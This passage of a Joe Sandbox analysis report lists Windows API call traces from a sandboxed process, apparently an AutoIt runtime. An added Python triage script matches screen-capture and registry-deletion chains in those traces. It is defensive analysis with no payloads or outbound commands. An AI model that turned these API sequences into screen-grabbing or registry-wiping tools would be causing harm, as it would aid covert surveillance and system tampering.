                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00A57C10,00000061), ref: 00A05188
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                  • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                  • Opcode ID: 5ee6598a406206ddb4152db2a174094fa19f0397e78c10c63c0e56e6e0be4505
                                                                                                                                                                                                                                  • Instruction ID: a4e167816a5eabb6140155867df33bd78f5d19fc6556bab832e31828120a3008
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ee6598a406206ddb4152db2a174094fa19f0397e78c10c63c0e56e6e0be4505
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2B1BF71A087069FC710EF38E990AAFB7E5BFA4724F50491DF596872D2DB30D844CA92
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1BBF8
                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A1BC10
                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A1BC34
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1BC60
                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A1BC74
                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A1BC96
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1BD92
                                                                                                                                                                                                                                    • Part of subcall function 00A00F4E: GetStdHandle.KERNEL32(000000F6), ref: 00A00F6D
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1BDAB
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1BDC6
                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A1BE16
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00A1BE67
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00A1BE99
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A1BEAA
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A1BEBC
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A1BECE
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00A1BF43
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2178637699-0
                                                                                                                                                                                                                                  • Opcode ID: 93d7309ba8edee233950b5a8e17d299ccbdfbaa705ab403cd1251aa12e25cd27
                                                                                                                                                                                                                                  • Instruction ID: 78893ce9cdb1401b15744b3bae44d4e0402c084e188a0d78af4b58b00a7edbe3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93d7309ba8edee233950b5a8e17d299ccbdfbaa705ab403cd1251aa12e25cd27
• Instruction Fuzzy Hash: 85F19E715183009FCB14EF28C991BABBBE5BF85310F14855DF4859B2A2DB31EC85CBA2
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00A2DCD0), ref: 00A14B18
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A14B2A
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00A2DCD0), ref: 00A14B4F
• FreeLibrary.KERNEL32(00000000,?,00A2DCD0), ref: 00A14B9B
• StringFromGUID2.OLE32(?,?,00000028,?,00A2DCD0), ref: 00A14C05
• SysFreeString.OLEAUT32(00000009), ref: 00A14CBF
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A14D25
• SysFreeString.OLEAUT32(?), ref: 00A14D4F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 354098117-199464113
• Opcode ID: 1ebc25391707388dbdddccda9d6437802e3c9f1290f01b17f0348fd23576e2ee
• Instruction ID: 8bcf027ddece86a8ccfcae97e2908d9eb0b089ab57d5b6f5f0fd806c63923ddc
• Opcode Fuzzy Hash: 1ebc25391707388dbdddccda9d6437802e3c9f1290f01b17f0348fd23576e2ee
• Instruction Fuzzy Hash: 65121B75A00115EFDB14DF98C884EEABBB5FF49714F248098F909AB251D731ED86CBA0
APIs
• GetMenuItemCount.USER32(00A629C0), ref: 009D3F72
• GetMenuItemCount.USER32(00A629C0), ref: 009D4022
• GetCursorPos.USER32(?), ref: 009D4066
• SetForegroundWindow.USER32(00000000), ref: 009D406F
• TrackPopupMenuEx.USER32(00A629C0,00000000,?,00000000,00000000,00000000), ref: 009D4082
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009D408E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
• Opcode ID: 2dbc367761854d81b76bf533e3c68df2e32db0bee913cb1c71168b5958981755
• Instruction ID: 573a5b05454cab80e1a66dedb230cb7296c41893bd0848f7d3c0d8cb7c331d56
• Opcode Fuzzy Hash: 2dbc367761854d81b76bf533e3c68df2e32db0bee913cb1c71168b5958981755
• Instruction Fuzzy Hash: 8271F570A84209BBFB218F6DDC49FAABF68FF44368F10C216F614A62D1C7B19910CB51
APIs
• DestroyWindow.USER32(00000000,?), ref: 00A27823
  • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A27897
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A278B9
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A278CC
• DestroyWindow.USER32(?), ref: 00A278ED
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00990000,00000000), ref: 00A2791C
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A27935
• GetDesktopWindow.USER32 ref: 00A2794E
• GetWindowRect.USER32(00000000), ref: 00A27955
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A2796D
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A27985
  • Part of subcall function 00992234: GetWindowLongW.USER32(?,000000EB), ref: 00992242
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
• String ID: 0$tooltips_class32
• API String ID: 2429346358-3619404913
• Opcode ID: 38e8574536b1061698b417a5c4ad8f9e75467f94e2868ff8b174f533cd538e06
• Instruction ID: f0e7a7da9244c0d0d221a5b559d2241c4ad06b28405757720a993ddc78a769c7
• Opcode Fuzzy Hash: 38e8574536b1061698b417a5c4ad8f9e75467f94e2868ff8b174f533cd538e06
• Instruction Fuzzy Hash: 10716571109344AFD725CF5CDC48B6ABBF9FB89304F04046EF98587261C7B4AA86CB12
APIs
  • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
• DragQueryPoint.SHELL32(?,?), ref: 00A29BA3
  • Part of subcall function 00A280AE: ClientToScreen.USER32(?,?), ref: 00A280D4
  • Part of subcall function 00A280AE: GetWindowRect.USER32(?,?), ref: 00A2814A
  • Part of subcall function 00A280AE: PtInRect.USER32(?,?,?), ref: 00A2815A
• SendMessageW.USER32(?,000000B0,?,?), ref: 00A29C0C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A29C17
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A29C3A
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A29C81
• SendMessageW.USER32(?,000000B0,?,?), ref: 00A29C9A
• SendMessageW.USER32(?,000000B1,?,?), ref: 00A29CB1
• SendMessageW.USER32(?,000000B1,?,?), ref: 00A29CD3
• DragFinish.SHELL32(?), ref: 00A29CDA
• DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00A29DCD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 221274066-3440237614
• Opcode ID: 7a483246a1a7c2f9a515bda764bed86185f01483dc32ca4ae85488da06464886
• Instruction ID: 8b1d53e1ad86ca859915dfb5144b26306f07ff09640bad05344cd2c4dda4dff1
• Opcode Fuzzy Hash: 7a483246a1a7c2f9a515bda764bed86185f01483dc32ca4ae85488da06464886
• Instruction Fuzzy Hash: DF614671108301AFC701EF58DC85EABBBF8EFC8750F40092DF595921A1DB70AA4ACB52
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00A266D6,?,?), ref: 00A28FEE
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A28FFE
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29009
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29016
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29024
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29033
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A2903C
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29043
                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29054
                                                                                                                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A30C04,?), ref: 00A2906D
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00A2907D
                                                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00A2909D
                                                                                                                                                                                                                                  • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00A290CD
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00A290F5
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A2910B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3840717409-0
                                                                                                                                                                                                                                  • Opcode ID: b4ba97702c0499eea80d520d40d98a3acaf7d74020d3a624d79e1c76535ef24a
                                                                                                                                                                                                                                  • Instruction ID: 7d529f1f32d0bf1037cfd1fa7faa5f41e8e5dfb6f373850c588849385eeb35b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4ba97702c0499eea80d520d40d98a3acaf7d74020d3a624d79e1c76535ef24a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C410875600218EFDB21DFA9DC48EAB7BB8EB89B15F104068F905D7261D7709942DB60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A1C10E,?,?), ref: 00A1D415
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D451
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4C8
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4FE
                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A1C154
                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A1C1D2
                                                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 00A1C26A
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00A1C2DE
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00A1C2FC
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A1C352
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A1C364
                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A1C382
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00A1C3E3
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A1C3F4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                  • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                  • Opcode ID: 3b1c6f0891a68ba4c681e38e8984ae8ef3bf71103180a6f4366c05cd935aa2c1
                                                                                                                                                                                                                                  • Instruction ID: 704bafcadbb3186cae647098ab03cac3776cc6501bdb0a1d77db3daa820d09f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b1c6f0891a68ba4c681e38e8984ae8ef3bf71103180a6f4366c05cd935aa2c1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7C1A031208201EFD710DF58C495FAABBE5BF84314F14859CF46A8B6A2CB35ED86CB91
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00A13035
                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A13045
                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00A13051
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00A1305E
                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A130CA
                                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A13109
                                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A1312D
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00A13135
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00A1313E
                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00A13145
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00A13150
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                  • Opcode ID: 4854f8b4b878710e4bed85ec5623d0fcfa36ec4e6b5bcfce56f2605104a33712
                                                                                                                                                                                                                                  • Instruction ID: c40cc38be54980363218cf0e15e40bc546ecc0f4e9df2407c6bbc01792b55e29
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4854f8b4b878710e4bed85ec5623d0fcfa36ec4e6b5bcfce56f2605104a33712
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7161D2B6D00219AFCF14CFE8D984AAEBBF5FF48310F208529E559A7250D771A952CF90
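The three function records above from process 10 (image base 00990000) each show a recognisable API chain: a file read turned into an OLE picture and pushed to a control with SendMessageW(…, 0x172, …) (0x172 is the Windows STM_SETIMAGE message), a registry value/key deletion that resolves RegDeleteKeyExW from advapi32.dll at run time and falls back to the static RegDeleteKeyW import, and a GetDC / CreateCompatibleBitmap / StretchBlt / GetDIBits screen capture. The @GUI_DRAGFILE / @GUI_DRAGID / @GUI_DROPID strings in the first record are AutoIt macro names, so these chains are consistent with an AutoIt runtime's built-in functions rather than hand-written code, which is worth knowing before treating any one of them as a detection. The script below is an added example, not part of the Joe Sandbox report or of any analysed sample: it parses "APIs" records in this listing format and flags the chains by ordered-subsequence matching over the API names. The chain definitions and labels are this example's own assumptions; the embedded records are trimmed copies of the three listings above.

```python
"""Triage helper for Joe Sandbox function-level "APIs" listings.

Added example, not part of the Joe Sandbox report and not code from any
analysed sample. It parses the bullet lines of a function record and flags
behaviour chains by ordered-subsequence matching over the API names. The
chain definitions and their labels are this example's own assumptions.
"""
import re
from typing import Dict, List, NamedTuple, Set

# Trimmed copies of three "APIs" records from the report, keyed by the ref
# address of their first call. Line order is what the chain matcher relies on.
REPORT_RECORDS: Dict[str, str] = {
    "00A28FEE": """
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00A266D6,?,?), ref: 00A28FEE
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29033
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29054
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00A30C04,?), ref: 00A2906D
• CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00A290CD
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A2910B
""",
    "00A1C154": """
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A1C154
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A1C1D2
• RegDeleteValueW.ADVAPI32(?,?), ref: 00A1C26A
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A1C352
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A1C364
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00A1C382
• FreeLibrary.KERNEL32(00000000), ref: 00A1C3E3
• RegCloseKey.ADVAPI32(00000000), ref: 00A1C3F4
""",
    "00A13035": """
• GetDC.USER32(00000000), ref: 00A13035
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A13045
• CreateCompatibleDC.GDI32(?), ref: 00A13051
• SelectObject.GDI32(00000000,?), ref: 00A1305E
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A130CA
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A1312D
• ReleaseDC.USER32(00000000,?), ref: 00A13150
""",
}

STM_SETIMAGE = "00000172"  # Windows STM_SETIMAGE message, as printed in the args column


class ApiCall(NamedTuple):
    name: str
    module: str
    args: List[str]
    ref: str
    subcall: bool  # printed by Joe Sandbox as "Part of subcall function ..."


# One bullet line: optional subcall prefix, Name.MODULE, optional (args), ", ref: addr".
API_LINE = re.compile(
    r"(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the bullet lines of one record into ApiCall tuples, in listing order."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            calls.append(ApiCall(m.group("name"), m.group("mod"), args, m.group("ref"), bool(m.group("sub"))))
    return calls


# Each chain is an ordered list of steps; a step is satisfied by any API in its set.
# A record matches when every step occurs, in order, not necessarily adjacent.
CHAINS: Dict[str, List[Set[str]]] = {
    "screen_capture": [{"GetDC", "GetWindowDC"}, {"CreateCompatibleBitmap"}, {"CreateCompatibleDC"},
                       {"SelectObject"}, {"BitBlt", "StretchBlt"}, {"GetDIBits"}],
    "dynamic_reg_delete": [{"LoadLibraryA", "LoadLibraryW"}, {"GetProcAddress"},
                           {"RegDeleteKeyW", "RegDeleteKeyExW"}],
    "ole_picture_to_control": [{"CreateStreamOnHGlobal"}, {"OleLoadPicture"}, {"SendMessageW", "SendMessageA"}],
}


def match_chain(calls: List[ApiCall], steps: List[Set[str]]) -> bool:
    i = 0
    for c in calls:
        if i < len(steps) and c.name in steps[i]:
            i += 1
    return i == len(steps)


def resolved_imports(calls: List[ApiCall]) -> List[str]:
    """Names passed to GetProcAddress by string (addresses and '?' are skipped)."""
    return [c.args[1] for c in calls
            if c.name == "GetProcAddress" and len(c.args) > 1
            and c.args[1] != "?" and not re.fullmatch(r"[0-9A-Fa-f]{8}", c.args[1])]


def triage(record_text: str) -> Dict[str, object]:
    calls = parse_api_lines(record_text)
    return {
        "calls": len(calls),
        "chains": sorted(label for label, steps in CHAINS.items() if match_chain(calls, steps)),
        "resolved_imports": resolved_imports(calls),
        "stm_setimage": any(c.name.startswith("SendMessage") and len(c.args) > 1
                            and c.args[1] == STM_SETIMAGE for c in calls),
    }


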